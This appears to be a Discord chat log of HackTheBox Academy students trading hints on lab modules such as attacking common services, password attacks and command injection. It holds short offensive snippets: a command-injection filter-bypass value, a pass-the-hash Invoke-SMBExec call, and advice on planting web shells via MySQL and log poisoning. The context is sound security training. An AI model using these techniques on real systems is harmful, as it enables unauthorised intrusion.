#modules
Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?
Thanks, I specialize in Linux, so Windows hurts me, lol, but I am getting the hang of it
I'm having a weird one, doing the NMAP module and I'm enumerating services to find a flag but I can't seem to find it. I've tried manually scanning each port. I've also been running tcpdump whilst also manually connecting via NC to each port to see if it's been hidden in some weird header. Have I missed the point of the challenge?
Or am I to actually enumerate the services and find a vulnerability in the service itself?
nope, enumeration should be enough, but sometimes the service takes too long to respond so nmap just gives up
Thanks for the hint, will get back to it.
the script banner may timeout and you get nothing back, I am not sure how to increase the timeout, but if you nc ip port and wait it works also
ok, then I know this with LHOST, but why they told two and I see six required with yes?
the others are pre-populated with default values that are usually fine
but LHOST for your payload callback and RHOST for the target youre running the exploit against still needs to be added
ok, then I don't have to look at all required with yes and set something. Therefore they told two. I understand. thanks.
if it says yes and is blank then definitely have to set something otherwise usually can ignore it.
that said its super exploit to exploit dependent and you should be fully understanding an exploit and what it does before running it.
At these early stages with controlled labs and still learning the basics its fine to be a little loose with this, but if you get to the point of doing some real world stuff youll absolutely need to be capable of that understanding.
now, I understood.
Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help? when running curl i get the error "header without colon"
Thank you for the help!
Pm what you've tried and I'll nudge you
I need help with the Osint Corporate Recon module with this specific question : What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany? (format: 00.0000 N, 0.0000 E) I'm stuck because the coordinates I got from google don't work and I'm pretty out of options
hello am stuck in Cracking Common Hashes, i think its a ntlm hash, i used a bunch of rules but i dont seem to get something
Thanks. I've understood. For now on, if you got an hint since I'm specific, I'll take any 🙂
try changing your google region settings to the country from where Oktoberfest originates
I was also going to say are you sure you have the right city?
Cause the city I found seems to be different than the incorrect city people complain about in the forums.
but ive also not done that module so I cant confirm if my answer is correct
Set the language of the browser to English
I've set the browser in english and the country in germany and i got the same result here :
can't share the screenshot weird
cause your account isnt verified
i got this in fact : 51.0951° N, 10.2759° E
not the city I found
You didn't find Frankenroda?
nope
but caveat again, Ive not completed the module so idk if my answer is correct either
but the inlanefreight blog has a fun little offices section
not sure where people are finding frankenroda from
Ok you've got me to find it
The city Frankenroda is directly from google
and the other town you got me to try is on the site
so we got 2 options for the answers
Thanks a lot to all of you
Dumb question, but on the SMTP section of Attacking Services, I got the creds but need to log in. Anyone able for a nudge?
Anyone else have no internet access on the Live Engagement, Box 2? This is the one with the blog. I've searched high and low in Metasploit for the indicated exploit, without luck and so am assuming the path is to get the exploit into Metasploit...just not entirely sure how to effect that if the victim box has no internet connection. If anyone has a clue, I'd be grateful! 🙂
Is the module properly loaded? Check with Get-Module. If it is loaded add -Verbose to read the output and troubleshoot from there
Can I dm someone about the easy footprinting lab? I have already completed the module, but I am going through and making a walkthrough for future reference and to reinforce the information, but now I believe that something is not working the way that it should be anymore.
https://imgur.com/NrJG5p2 - looks to be same thing but the module is loaded
hey guys im on attacking common services and on mail section. im stuck at the beginning. i tried enumerating users with smtp-user-enum but i got nothing
🤷♂️
i used the provided user list in resources
been stuck on this for some time, tried doing it alone but not working for now...
nvm... i found the user.... sorry
Hello. Need help on the last question for Pass the Ticket (PtT) from Linux.
let me pull up my notes, sec
do u mind reminding me where r u at rn?
like what r u stuck at
yeah just sent a dm
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. Can someone help I am stuck on this module.
fuzz it
what r u stuck on, u dont know how to fuzz with burp?
Well no and according to what I have searched its not Burp that will solve this I believe Zap has to be used
I make the Question from Public Exploits. Now the Metasploit said: Msf::OptionValidateError The following options failed to validate: RHOSTS.
I want to know if this error occurs perhaps because I was too slow and the IP:Port is no longer valid? Or does that means I have to use a different exploit?
Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?
Hey guys, I'm trying to solve the command injection skills assessment. I found the parameter and I think I have the operator. I received ||Malicious request denied!|| from the server, but I'm stuck there
no, u can use burp too
Ok
wrong reply*
there is a bunch of fuzzers
any of them should work
but if it's intended to teach u how to use burp then use burp ig
Nvm literally just figured it out one minute later
ok I just don't understand how to fuzz with Burp
In my module no is something with burp.
what module is that?
Public Exploits from Cracking into HTB Getting Started
the error is RHOSTS?
did you set rhosts?
rhosts = target
if you don't set rhosts you don't have the target for the exploit
I have put RHOSTS and LHOST. But now it said 178.128.46.49:443 - The target ist not exploitable. Connection failed. But I have tried also, that I put the Port 31513 from the target (Question) for RPORT and for LPORT, but in neither case did it work.
can you type show options and send a screenshot please
most of the time you are not needed to provide the port for the rhosts except if the service is on uncommon port
Having an issue in the Query Results section of SQL Injection Fundamentals. I think I have my query formulated properly, but I'm getting a result of Empty set, 1 warning. My query is as follows > Select * FROM employees WHERE first_name like 'Bar%' AND hire_date = 1990-01-01;
Can you see something? It said: 178.128.46.49:443 - The target ist not exploitable. Connection failed. Therefore I thought, that I have to change the RPORT.
is the rhosts your target ip?
yes
I work with openvpn. Shall I change to the integrated spawns?
doesn't really matter
are you sure its the right exploit?
i dont have notes on this soo i dont know...
Sure? no. 🙂 With searchsploits I have found this. Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) (multiple/webapps/50383.sh) But I didn't know how to put it in Metasploit Framework. But now I have an idea. I can copy this and can put it into Metasploit Framework.
edit: no, that didn't work. I have tried it with another exploit but this no works, too.
edit-2: I've forgotten to see into the Hint. That told me that I have to search for plugin exploits. --> I want to make it now.
Is this the "Getting Started" module, Public Exploit?
If so: then you will need to navigate to the webpage via http://ip:port/
That will get you the info you actually need to exploit
Thanks a bunch. I was stuck on this for a while lol
Unfortunately, it never occurred to me that I could take a look at the website. 😕 But now I have only one exploit. 😄
Yeah I feel super dumb lmao
Whenever you're given IP:PORT it's a docker container, meaning website
were you ever able to get this figured out? I haven't been able to get the exploit into metasploit for some reason
It also doesn't follow the 10.x.x.x format of other targets in other modules
For the OSINT module, I do not see any other cities listed that could be headquarters for inlanefreight.com other than Oberhausen, Brighton, and Denver. When I put in the latitude and longitude in Decimal format that I find from Wikipedia (geohack.toolforge.org) for each of these cities the answer is incorrect. What am I missing?
Has anyone here gotten past the Query Results section of SQL Injection Fundamentals? I could use some help with the query needed for this section. I'm not sure why mine is wrong.
im doing attacking common services email section and i've found the creds but i do not know where to use it to log in?
well if its the email section have you tried logging into the email
haha
yeah
but before i've used evolution but now its not working for some reason
so idk whatelse to use
I just use netcat
netcat? how so
its just a text protocol, the section goes over it
no it doesn't 🤷♂️
yeah, but when i try to run command on telnet
i get this error
"503 Bad sequence of commands"
well u can re do them
Can anyone help with the File Upload Attacks -> Limited File Uploads module? I got the first question but having issues with the second question. The only thing I can do is read the content of /etc/passwd .
i just tried VRFY root
then i tried the same cmd with the user i have
always same thing
why are you trying to vrfy root when your goal is to login
Never mind. It helps to put ' around the information you're querying for.
its a bit annoying cause the section doesnt actually tell you how to check mail manually or login manually, you gotta do some googling
one of the two services was easier to do by hand than the other but idr which one
yeah im doing that rn
but its not like working
so idk if i maybe got false positive with hydra or sm
for the password...
First I was able to browse the server on the target with the right exploit. But then I accidentally closed the terminal and now it only searches my own computer and no longer the target computer, even though I entered the correct IP under RHOSTS. Do you happen to know what I messed up here? Because I've been at it for a long time and have tried many things, but I always end up on my computer.
In case anyone needs this, you have to use Google's coordinates, not any other service. When asking correctly the answers are big numbers at the top of the result.
Sure
thanks dmed you
Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?
this is the question: Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: ****.gif)
someone can give me a hint? I can't get any further with the exploit I found. I can't access the server with it. At least I can't. Now I read in the description of the exploit that the file can be downloaded directly from the website. I'm trying to use the exploit's instructions, but I'm always downloading a file that's empty.
Who can give me a tip please? I've been trying to answer this question for many, many hours now.
You have to ask Google nicely for the coordinates of the relevant cities. Not search for the full domain.
who can help me the skill assessment "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."
maybe: get-module xyz | get-command
or look for the places where modules are installed on disk
no hava
first you must find the Domain's password
do you have to guess it?
fuck I was finish,I am not nocie
The right RHOST is the IP but you also need to put in the right RPORT
It's same username/password for that user
Also maybe change the Filepath
hey is anyone available tomorrow at 3 to 4:30 PST to help me one on one with the Intro to Network Traffic Analysis module's Interrogating Network Traffic With Capture and Display Filters section
I need help sifting through a fuckton of TCPDump output
I do what the instructions say but there's just so much output here
to sift through to find what it wants me to find. I can do it but just need a little help narrowing down output. Here is command I normally use:
sudo tcpdump -Sr TCPDump-lab-2.pcap
That doesn't narrow it down enough for me I don't think
I tried researching it and I tried some stuff off stack overflow for someone who had a similar issue to just get TCP three-way handshakes but to no avail
DM me if you are available to help tomorrow
or actually, DM me if you are able to help any time between 2:30 and 5
thank you
Module : INTRODUCTION TO WINDOWS COMMAND LINE
Section : Skill Assessment
Question8 : For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.
hi i have been lost 1 day, i have run the module Get-Flag and its said : the flag you are looking for is
i try find the module but im lost. can you advice me what to do?
This is a spoiler but try removing the {}
OH GOD! i made a silly thing! thanks so much
Module: Password Attacks - Pass the Ticket (PtT) from Linux - I am stuck on the last question.. The question is: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
I was able to retrieve the flag.txt from \DC01\linux01 but that flag doesn't start with Us1nG and its not accepting what I did find...
Remove the flag from your post @solemn gull
Does it have a couple unreadable characters? If so then don't include those
yes i have remove it, thank you
Not sure I understand what you mean.
hi can anyone help me right now with this module?
DM me the flag you have
Cause it may be the issue I think it is
like I don't need to wait until tomorrow if someone can help me right now
Ah different flag are you sure you used the right file: hint the Linux01 is in a different location completely
For the keytab
It's more of a cache
hi I need help with the Intro to Network Traffic Analysis module. Anyone able to help me tonight?
Just be patient dude it's a Monday so most people are probably busy
ok sorry
I used the one in /etc is that the wrong one?
did no one really do javascript secure coding...
Yes
Iirc one of the example images shows you where to look
just use wireshark
the point of this section is to use TCPDump instead of Wireshark
the next four sections after this one are on Wireshark
Though I found it by stumbling around. Just think about the info you find from realm and that there must be a __d__aemon that runs it (so {service}d) @obsidian crescent
You will find your Linux info there :)
I'll give it a go, thank you!
shoot me a dm because the section doesn't show you how to filter a tcp 3 way handshake in tcpdump
ok
So it doesn't show how to get the syn,Syn-Ack,ack handshake? shame
i mean the it did show you the absolute tcp sequence numbers tag which have the right answer you just have to find it in 535 word all dumped without color
Gross
Hi all. I am trying to redo the AD enum attack skill 2. The first time I did it I remember getting the admin hash on the 7.60 host by launching lazagne as admin and reuse the hash in 7.50. But now I get a different hash and this one doesn't work on the first host. I can figure out why my output are different this time. Am I missing something? 😅
Thats the way
But why my hash are different? I don't suppose to get a hash valide for both host?
😢
Can figure out what I missing this time. It makes me crazy 😅
Can you give me a hint?
Hello guys,
I have a show and i don't know what should i do, can you give me projects or idea for the show?.
Can you take your certification from hackthebox and use it in jobs?
yeah this is a bit too much spoiler i would say
this isn't the best place to ask this
Ok where.
I am not sure if it is a spoiler at all. @spiral pelican told me already used lazagne
i mean the process chain is spoiler of course the topic is showed in the section but reviewing what to do in each step here is a bit too spoiler (here)
hinting the path is completely ok in DM
Srry about that. I ll ask in dm in place 😅
anyone have completed this Bypassing Blacklisted Commands
need help in this
ip=127.0.0.1%0aw'h'o'am'i this command is working for me but how can i make call for user/home/flag.txt
cat I guess
that's for you to find out, try to have another go at the module content the answer is there and don't give up 💪
try to check step by step which char is blacklisted and go from there
check the cheatsheet, there you can find some useful commands to help you craft the end command
anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
Hello I’m trying the module introduction to python 3
And I’m stuck in the question “the type of foo from question 1 is class set . What is the type of x_coordinate ?”
Can anyone please help
Passwords attack: PTH Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
Q: How can i find DC01\david , i -list shares from david user with his hash using cme and there is no DC01\david. evilwinrm> ls \dc01\david -> path not found
file upload attacks/blacklist Filters i cant get the webshells to work. it wont execute the php and asp
i will dm you
hii
Hi. Some one is available for giving help in AD enum? I have a very strange issue and I don't want to write any spoil 🙂
anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64
how would one find the community string
this is for the hard footprinting module
ik u need to do something with snmp but snmpwalk times out with the public string
No one?
anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64
also I cannot upload svg file, even if I delete those two line via inspecting the page
Think about php filter
Who Ping Me
cant seem to log in to the mysql server on the hard footprinting lab
ive got the user and the password
it just outputs all the help options
nvm
got it
lol
Hope I can get a little help. I am sooo new and I'm stuck on the introduction module. I do not understand what I'm supposed to do when I am spawning and trying to find out the answer to the question. Can I get assistance on what I am to be doing?
sure what do you know so far
literally nothing. I have no idea how to spawn or what i am to be looking for
I just started learning the basics on information technology and trying to get into cybersecurity
getting this error for mysql ERROR 2002 (HY000): Can't connect to MySQL server on '10.129.125.31' (115)
Anyone has this error too? idk what to do with that 
when I have the IP for the spawn. obviously i am connected to the same internet i'm assuming but when I'm an to be looking for the proof text am I suppose to be using the PowerShell to find something using basic commands?
so using the work station you will open firefox then from there you will put the target into there it should show you some result
make sure its in the spawned environment
ok
wow, went way over my head. I may be slow at this but I'm dedicated to learn it
thank you
No worries man I'm going through the same pain as you so I know how you feel hope your journey goes well
thanks
Who can help me solve this problem in the user where to look,question "Who can help me solve this problem in the user where to look"
Module: Kerberos Attacks
Unconstrained Delegation - Users
Need help.
Successfully retrieved tgt from dc01, yet can't perform dcsync with impacket-secretsdump (after exporting KRB5CCNAME) = No output. Tried psexec, yet receive "Name or service not known".
Edit: Nvm, i figured it out. Needed to add additional flag to secretsdump
hey, i have a difficult time in AD Enumeration & Attacks - Skills Assessment Part II q10, could someone give me a nudge?
Any ideas why my smtp-user-enum is not returning any results for the footprinting exercise? I have set -w 25 and have the correct target IP + file path and name list. Here is my command: "smtp-user-enum -M VRFY -U /opt/useful/SecLists/namelist.txt -t 10.129.163.85 -w 25". It is just continuously running and not giving me any results.
Hi all, at the Password Attacks module, Credential Hunting in Linux section I try to ssh to the server with the credentials provided in the hint, but with no success. Am I missing something?
Module: ATTACKING COMMON APPLICATIONS
Section: Attacking GitLab
i have been enumerating users for the past few hours and i have not gotten any valid users.
i am currently using the xato-net-10-million-usernames list. i tried with multiple shorter wordlists from seclist but did not get anything.
Anyone still need help?
Im still stuck on Pass the Hash (PtH) - Windows Lateral Movement - last question lol
which module?
Seems like im following the steps correctly but when I try to use invoke wmiexec - nothing happens, Not even an error
alright give me a second to boot it up, I dont have notes
no problem
please me
.
Ok I am back and I didnt get the flag with the reverseshell
So I dont even have to use smbexec?
whats odd is when I run even that command, nothing happens. https://europe1.discourse-cdn.com/hackthebox/original/3X/b/1/b144fa7b3bc360e2d129d5521aaaf07d23ce5d40.jpeg
Shouldn't I get an error at least?
Ive gotta be doing something so stupid for it to not verbose anything
for you i think its the .\
When I dont use the .\ it gives error that the term cant be found
This one?
Crack this user's password hash and submit the cleartext password as your answer.
psd1
Import-Module .\Invoke-TheHash.psd1
then
Invoke-SMBExec -Target 172.16.1.10 ......
wow I think this was it lol
this whole time I just needed 1 letter
🎉
So my brain can understand, can you or anyone explain the difference between those two files? they are the same name but one is ps1 and the other is psd1?
thank you!
use ||hashcat|| to crack this NTLMv2 hash
|| https://hashcat.net/wiki/doku.php?id=example_hashes ||
You still need help?
yes please
Alright so what are you trying to do?
ssh to the server with the credentials provided at the hint of the question in order to obtain the password of the user Will
the last couple of hours I am trying to brute force my way in as the creds are not working, with the lists of usernames and passwords provided in the resources
alright im on it, give me a min, no notes
i think i'm being dumb, but i'm having issues parsing this question in the "dns enumeration with python" module: submit the one unique record in double quotes as the answer.
does this mean that the -answer- should be in double quotes? or that the -record- is in double quotes? and is it looking for the type of record, the value of the record, or the full dig/nslookup output for the record?
There is a record that contains a string that is enclosed in double quotes.
ok got it finally. was just very confused by what it was looking for
ok i got it
first they give you a password list and a set of rules, but the hint can allow you to focus on some passwords
using that, create a mutated password list
ohh.. ok thanks, that was unnecessarily misleading
Has anyone finished the shells and payloads module?
Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?
#Module: Attacking Common Services
#Sections: Attacking SQL Databases
Once the mssqlsvc password found, you can connect on the db using domain authent with the following mssqlclient.py command :
||mssqlclient.py -p 1433 WIN-02/mssqlsvc@10.129.33.61 -windows-auth||
Thanks
hi i can't use daily free pwnbox. when i started it see this error:
Error!
You have used your allowed pwnbox time
"You have used your allowed pwnbox time"
nah dude i haven't even been on htb for a week
hey guys im still stuck on attacking email on attacking common services
i got the creds but can't log in :DD
check credits make sure there are no spaces
no the thing is idk how to log in
i tried via evolution, it didn't work
i tried telnet, no
my f**king htb openvpn doesn't work in windows so i cant do machines
when it rains it pours
i came i saw
can anyone use htb openvpn on windows?
Probably not. Since it makes more sense to use the VPN in a VM that you're attacking with
And can cause problems
my friend does, he uses ubuntu subsys on windows
but i wouldn't recommend tbh
he just does that cuz he is lazy to install inux
linux
Need a nudge on Broken Authentication - Brute Forcing Passwords, I'm definitely missing something obvious but can't put my finger on what
my 6gb ram's reaction to that information 
do dual boot then
you are right or i will buy new ram
that works too ¯_(ツ)_/¯
Does anyone know of any award-winning online ctf competitions? xD
No
i've earned good money for ctf competitions but now days they are not dont do it
oh sorry my bad
its not working, idk if i got
false positive
creds
stuck on this for like a day lmao
annoying af
Use the provided username list. Iirc there's a tool that does VRFY for usernames you provide it
no i got
the creds
i just cant log in
or don't know how to i
ig
no?
i tried using telnet
AUTH LOGIN
and then using the creds but it is not working
Aka fake@example.com@ip
via what?
Isn't there pop3s or IMAPs running?
It's been a moment since I did the email ome
One*
shi, ur right
i've been trying smtp only

guys i have a question
which version of parrot is better?
security audition OR Hack The Box Edition ???
Try connecting to standard IMAP / POP3
They're the same thing
Also you didn't specify protocol
u mean :imaps
so what's the difference between them?
Default tools installed, but there's the same access to the repo tools
¯_(ツ)_/¯
HTB edition just gives you some HTB background images
Similar images to what's on the pwnbox
oh
do we have a role for HTB academy?
Not unless you subscribe to silver annual: however an account on http://app.hackthebox.com is free
I think that there are some parts of Academy modules that should be improved/changed. Someone should consider putting a separate feedback form where we could suggest corrections.
I am doing the Firewall and IDS/IPS Evasion Medium Lab and the wording of the hint is confusing.
What's the wording?
"During the meeting, the administrators talked about the host we tested as a publicly accessible server that was not mentioned before."
Ah
Okay that implies that the host that I am looking for is not the IP I have been given?
Just do your normal enumeration
And there are other machines on the subnet
It is not implying that
It is stating that there may be a service running that needs to be publicly accessible
Just enumerate the host
Ahhh, okay. Not too clear from that wording but thanks for clearing that up.
I get that, but if the wording isn't clear I could be trying to enumerate the wrong machine......
need some nudges/help with a few things on Broken Authentication in the dms
Module : Osint Corporate Recon
Question : What is the hosting provider for the inlanefreight.com domain?
I tried Shodan and got : DigitalOcean, LLC. Tried multiple way to write it without results
Anyone can point me toward the answer please ?
Password Attacks - Lab Hard - Is there any easy way to mount a drive ?
I have it, I just cant mount it
Use || whois with the IP ||
This is a guide on how to access a BitLocker-encrypted Windows volume from Linux, useful in cases of dual-booting Windows 10, 8 or 7, and a Linux distribution. It covers how to decrypt and mount the BitLocker partition from the command line, as well as how to add it to /etc/fstab, so it's automatically mounted on boot.
Thanks! - the last article was a little long and missing what i needed
@acoustic owl I'm try that right away, thanks a lot !
It worked. It was the same response but with (DOC-**) . They are really messing with us. Thanks for your help buddy !!!
yeah I'm kinda stuck on that
How?
Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?
nmap module
what have you tried
I tried using version, vuln script categories but that did not yield a flag
I also tried aggressive scan
the sections mention a bunch of other categories to try
ok i got an idea
password attacks - lab hard - i've got a couple files from a mounted HD, but not sure what to do with them. Any hints ?
well, what are the files youve gathered
one is a file marked sam and on is a file marked system
Ok well I've managed to use some other scripts and I found a webserver and some file contents but still no flag in the output, could you give me any leads please?
well, refer to the section notes about dumping sensitive data from sam files
thanks for the hint - hopefully this will wrap it up for me 🙂
And that's a wrap for me, thanks again!
Guys?
i got error Exploit failed: NoMethodError undefined method `split' for nil:NilClass Shells and payloads skills assesment. can u help me ?
If anyone has finished this module, it will already help. I didn't want to give spoilers
Good luck then
I'm currently editing Hacking into HTB - Getting Started. It is often the case that I cannot run commands such as nmap, gobuster with the target IP. Then I get the message that I can't get a connection. Is that what HTB wants or what can be the reason? Because of course I would also like to try out a few commands that are explained in the module or in the previous modules. So I can practice and see how things work. Hence my question.
Are you at your own virtual machine?
I am currently stuck at the Active Directory Enumeration Module at the ACL enum section, last question. What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) I tried the commands and they don't give me result even after waiting ages. I tried writing my own commands in powershell all also not working. Tried Bloodhound but can not find the ObjectAceType in it. I see the edges in Bloodhound but idk how to get to the right info. Can someone help me with it ?
how long did you actually wait
the command ran does indeed take a long time to run
Currently roughly 7 min I think
yeah try like 20ish
ffs 😂 Thanks
A lot easier with BH. Select your user > info > Outbound Control Rights
What is the method to escalate privileges with a shell with root busctl permissions? gtfobins seems to list an enumeration command.
Did you actually try the command? What module is this for?
at the time I did that section bloodbound wasnt able to solve that question
It's for Linux Local Privilege Escalation
Tried that but all of the things I gave as answers were wrong
I can't seem to understand the command, i thought it lists communaction between services.
communication*
Just trust gtfobins and see if it does the thing
Hey All, working on Host-02 in the Live Engagement, Shells and Payloads module. In running the exploit with all settings correct, I'm getting an error message "Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass" - if anyone can help that would be awesome 🙂
@fathom pendant was that for moi? 🙂 If so I'm setting all the ones required, including VHOST...perhaps I have the wrong payload set?
Yeah ok got it (with the command). The thing is the command and Bloodhound use different "naming conventions" for the same thing and hence the answer was not correct
sounds right to me
Maybe LHOST, however sometimes resetting msfconsole makes it work
ah ok, i've tried it over and over, oddly there is no LHOST listed as an option from what I'm seeing
Oh yeah I'm thinking diff module RHOST, VHOST, I think maybe one other option
@fathom pendant DM'd you a screenshot of what I'm seeing
i haven't done it in a minute and not at my computer to sanity check ¯_(ツ)_/¯
no hurry 🙂 I've been at this for three days already haha
grep '+' you may need to escape and do grep '+'
Anyone available for a nudge on Attacking Common Services - Easy? I'm on the last part, just need an assist with syntax
@fathom pendant well, I finally got it by changing the RPORT 🙄
yes
sure, dm me
Can you specify which one and why
Without spawning a target you will not be able to test the commands in the examples
Attacking Common Services - Hard module
Can anyone help me please? I'm stuck. I found user F** and credentials to RDP.. tried to connect to MSSQL with it but im unable. are there other credentials or something?
then I have to do it with the pwnbox?
Maybe MSSQL can only be accessed internally
well, yes I am working with the IP from the target.
it could also be that you don't have the same wordlist location from the example ¯_(ツ)_/¯
Like Seclist
If the target does not have an open webport then gobuster may not return anything
For example, I have the question from the module Public Exploit. I have a target and I have tried some commands which I learned in the module. But with netcat, gobuster, for example, I don’t have a connection.
yes, that I have controlled. The Port was open.
But only a few commands have a connection. So, I can’t try other commands.
Ah that requires the port as well with gobuster http://IP:port, with nmap you probably won't get anything as it's a docker container
The reason for nmap not working is to force you to think outside the box
@fathom pendant can i DM you?
Since you're not even giving context as to why: no
Ive connected to linked server and trying to get the flag but im doing something wrong.
Look around at what you can do in MSSQL
anyone
I have done so on #858470491676737536 but I think that a built-in feature in academy would be better.
quick question: without telling my secrets of HTB Academy's upcoming modules, has anyone thought of creating a path that works with other vendors besides CREST such as SANS or OffSec?
if there was a pathway for OSWE for example that would be gold
has that been actively considered?
I'm not saying its a big deal if they don't but it would be really great
I'm not complaining either way tho HTB Academy is so awesome its not even funny.
offsec is a direct competitor, so that's not going to happen
Does anyone know if windows is case sensitive?
For most things, windows is not case sensitive
i need a final hint for the hard footprinting lab
ive got into ssh and found the bash history
and know its got something to do with mysql but the ports are closed
You can access MySQL internally
with a private key?
im so lost
Also port may be filtered, not closed
what command would i use
You have ssh access yes?
yeah
:)
Like... It's hard to really explain it any simpler xD
Get rest and crack more tomorrow lol
the worst thing about this is
ive done most of the leg work
but i just failed at the easiest bit
That's why I say it's def time to take a break lol
has anyone done bash scripting
Check your nmap scan. ||Who own the FTP|| ?
Anyone able to give me a nudge on File Inclusion module - Skills assessment? I found LFI and I can view and poison the application log file. Poison is successful until I decide to poison with php code. Poisoning with php code "breaks" the poisoning and you can no longer poison the log, which means that there must be some filter that stops me. Where i'm stuck is that I cannot find a proper way to pass the shell and bypassing the filter.
The log file contains double quotes.
Make sure that you don't have double quotes in your payload
Yeah noticed that too, but i don't have double quotes in my payload and it still doesn't work
actually i'm dumb i had a space in my payload when i shouldn't have space there.. Thanks @rustic sage
Hi guys, can you help me for the WordPress hacking assessment ? I'm stuck on the last question.
Proceed as described in the module.
Find a file which you can customize and write your payload in it
list more
Hello, I'm currently on the "WINDOWS PRIVILEGE ESCALATION" module and the "Interacting with Users" section. I'm struggling with the question "Using the techniques in this section, how can I obtain the cleartext credentials for the SCCM_SVC user?". I edited @Inventory.scf to paste my IP address, but I'm not getting a response in Responder. I'm only receiving the hash from myself and not from the SCCM_SVC user. The note states, "In our example, wait 2-5 minutes for the 'user' to browse the share after starting Responder," but I have already been waiting for 5+ minutes. Please, what I'm doing wrong?
What command are you using?
sudo responder -wrf -v -I tun0
Is this to answer the question?
oh yeah, it is... have you tried procmon? It's been a while since I did this question, but it might be that you have to use one of the other techniques in the section
I tried also sudo impacket-smbserver share ./ -smb2support with same result :/
Anyone else having issues starting boxes?
Did you resolve this? I'm having the same problem...
Yes, the way the date must be entered has been adjusted
OK totally didn't spot that...thank you 👍👍
Hi everyone, I'm having trouble with the second question of the Windows Privilege Escalation Skills Assessment - Part I. I'm in but I can't elevate privileges, can someone help me please?
Why is what I wrote, "||authorization functions||", an error in "Active Directory provides authentication and <____> within a Windows domain environment."?
it expects only one word
Both are wrong
Does someone know what the expected format of the answer is in the Error-Based SQL Injection section of the Advanced SQL Injections module?
I am on the file transfers module, in the windows methods section and the first question is confusing me with what exactly I am supposed to do: "Download the file flag.txt from the web root using wget from the Pwnbox." If someone can nudge me in the right direction, it would be greatly appreciated. I don't understand where the file is, in regards to the web root, or the pwnbox. Do I need to use the pwnbox or can I use my VM? And do I need to host a server first somewhere? I am probably overcomplicating this but I am not sure where to go.
A bit of a noodle question but is there a more compact/ faster way of adding hosts to my /etc/host file? Im working on Attacking common applications module, and they give us a list of Vhosts. I just took the IP and the list and added them all to my /etc/host file, which works. But it looks trashy.
From reading it, I'd say the flag is on the web server in its web root. You can probably use either pwnbox or your own VM with VPN. Both should work.
As for hosting a server, no. Wget does not require that
Pivoting, Tunneling, and Port Forwarding complete 🥳
best module so far
now I know the problem. I have two computer and each were on the target. But this make trouble. Therefore someone I can make something and a few minutes later, no.
Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keeps saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?
For example, for a site like www.HTB-example.com, if I add a new file titled justtesting.php and put it inside the web root of the web server where HTB-example.com is hosted, then I could just go to www.HTB-example.com/justtesting.php in order to see the file.
Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.
- nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n
- nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-ping
Have also been monitoring via TCPDUMP & connecting with NC
Bro can help me in the last section
Can I DM ?
Yea mate
Replicate what’s happening in the SYN-Scan from a DNS port section then try connecting to a filtered port.
Thanks
I don't know about all of THAT lol
Don’t overthink it, revisit the last two sections before the labs.
did you check out every zone?
that's why i am asking
xd
there are several zones+_+
Check them all 🙂
dig axfr internal.inlanefreight.htb @<IP>
for instance
try all of them
you'll find
respect for Wrench)
Hahaha 🙂 in my opinion, watch dogs 1 and 2 are the best games ever made 😆
Watch dogs legion.. is really bad
i played both, agreed)
didn't try yet
Don’t 😅 waste of money hhah
kk xd
how long did it take i mean CBBH for you?
Watch dogs really motivated me to hack more and more 😆
great xd
Few months, but I have done all the modules twice and some modules even 3 times
wow
did you try some bugs?
ofc
Hi Guys, can someone kindly help me to find the email of the marketing team of HackTheBox?
or any other ways I can get in touch in with them ?
Think I am overthinking it
Or I have the answer and just can't see it
got redirected to the discord actually from that page
On the page below there is a form
Not really, I did CBBH to prepare for CPTS 🙂
yes saw that it's probably for people who are interested in CTF creation using HTB I'm looking for something else, but thank you
Atm I already finished CPTS path.. so I am working on offshore 😆
any kind of email will help tremendously
Otherwise you can also open a support ticket (Green Bubble).
HackTheBox does not publish an email address. So if you want to contact them, you have to either go through the support or fill out the form.
is there something that prevents you from filling out the form
got it thanks mate
just that my higher ups has asked me to get the email of the marketing team but I'll have a chat
Can anyone else give me a nudge with the hard av evasion in the NMAP module?
great!
you have odd number of quotes
try to add ";" before the new-line char. Of course remember to find a way to bypass the security filter in place. EDIT: I guess where the double quotes
thank you very much
hey guys im doing attacking common services easy lab, i got onto ||mysql|| and I've heard i need to upload a webshell, but i have no idea how to, where to etc... been stuck on this since yesterday pls help
You can write (malicious) files 🙂
Also in the modules, they will tell you how do to that exactly in MySQL
ohh okay, thanks!
to what dir tho? like any that is accessible to user of the webpage?
